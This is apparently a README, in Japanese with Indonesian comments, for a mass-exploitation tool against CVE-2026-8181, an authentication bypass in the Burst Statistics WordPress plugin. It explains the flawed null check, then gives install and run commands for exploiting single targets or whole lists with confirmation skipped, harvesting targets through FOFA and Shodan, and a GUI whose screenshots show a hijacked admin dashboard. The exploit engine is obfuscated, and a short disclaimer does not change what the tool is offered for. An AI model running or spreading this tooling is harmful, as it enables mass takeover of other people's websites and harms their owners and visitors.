
CVE-2026-8181 — Burst Statistics WordPressプラグインの認証バイパス(CVSS 9.8)による管理者アカウント乗っ取り。FOFA/Shodan統合とモダンなGUIを備えたマススキャナー。
CVSS 9.8 (Critical) — 認証バイパスから管理者アカウント乗っ取りへ
CVE-2026-8181 は、WordPress プラグイン Burst Statistics バージョン 3.4.0 から 3.4.1.1 における 認証バイパス の脆弱性です。このプラグインは、Google アナリティクスに代わるプライバシーに配慮したアナリティクスとして 200,000以上の WordPress サイト で使用されています。
この脆弱性により、管理者ユーザー名を知っている認証されていない攻撃者が以下を実行できます:
class-mainwp-proxy.php の is_mainwp_authenticated() 関数は、wp_authenticate_application_password() の戻り値の検証を誤っています。この関数は REST API コンテキスト外で呼び出された場合、null(WP_Error ではなく)を返しますが、コードは is_wp_error() のみをチェックします。null は WP_Error ではないため、認証が成功したと見なされます。
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
run.bat をダブルクリックするか、以下を実行:
py -3.11 gui_modern.py

CVE-2026-8181のモダンなGUI表示(3つのタブ)
Scanタブで:ターゲットソース(.envのFOFA/Shodan、ファイル、または手動)を選択 → SCAN TARGETSをクリック Exploitタブで:管理者ユーザー名を入力 → EXPLOITをクリック

ツールが脆弱なターゲットを発見し、エクスプロイトの準備ができました
エクスプロイトが成功すると、攻撃者は管理者として完全なアクセス権を取得します:

エクスプロイト成功後のWordPress管理ダッシュボード
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.envに追加.envに追加教育目的および許可されたペネトレーションテストのみを目的としています。 あなたが所有していないシステムへの無許可の使用は違法です。所有するサイト、または書面による許可を得たサイトでのみ使用してください。
| Flag | 説明 |
|---|
-t, --target | ターゲットURL(単一) |
-l, --list | ターゲットリストを含むファイル |
-u, --username | 管理者ユーザー名(デフォルト: admin) |
-T, --threads | スレッド数(デフォルト: 10) |
-o, --output | 結果の出力ファイル |
-v, --verbose | デバッグ出力 |
--timeout | リクエストタイムアウト(秒) |
--no-confirm | 確認をスキップ |